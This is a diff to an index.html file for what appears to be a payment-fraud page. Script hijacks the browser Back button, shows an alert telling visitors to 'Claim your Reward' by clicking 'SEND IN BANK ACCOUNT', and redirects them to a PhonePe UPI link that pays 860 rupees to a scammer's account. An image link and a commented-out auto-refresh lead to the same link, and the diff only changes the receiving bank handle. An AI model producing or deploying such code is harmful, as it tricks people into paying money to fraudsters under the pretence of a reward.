--- a/index.html
+++ b/index.html
@@ -37,7 +37,7 @@
  onpopstate=function (t)
  {
   t.state && alert(' Claim your Reward by Clicking on \n "SEND IN BANK ACCOUNT"  ')
-location.href='phonepe://pay?pa=mynewakount@sbi&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr '
+location.href='phonepe://pay?pa=mynewakount@axl&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr '
   ;
   }}
   catch (o){}}();</script>
@@ -103,7 +103,7 @@ location.href='phonepe://pay?pa=mynewakount@sbi&pn=YDV56693218&tn=thanks&am=860&
 	
 		<div>
 			
-			 <a href="phonepe://pay?pa=mynewakount@sbi&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr">
+			 <a href="phonepe://pay?pa=mynewakount@axl&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr">
 				 
 				 <img src="3 (2).jpg" width="100%" height="auto">
 				 
@@ -111,14 +111,14 @@ location.href='phonepe://pay?pa=mynewakount@sbi&pn=YDV56693218&tn=thanks&am=860&
 			
 		<!--	
 			
-             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=mynewakount@sbi&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr">
+             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=mynewakount@axl&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr">
         </div>
 
 	
 	
 	
 	
-	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=mynewakount@sbi&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr">
+	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=mynewakount@axl&pn=YDV56693218&tn=thanks&am=860&cu=INR&mode=02&purpose=00&tr">
 	
 	--->
 	
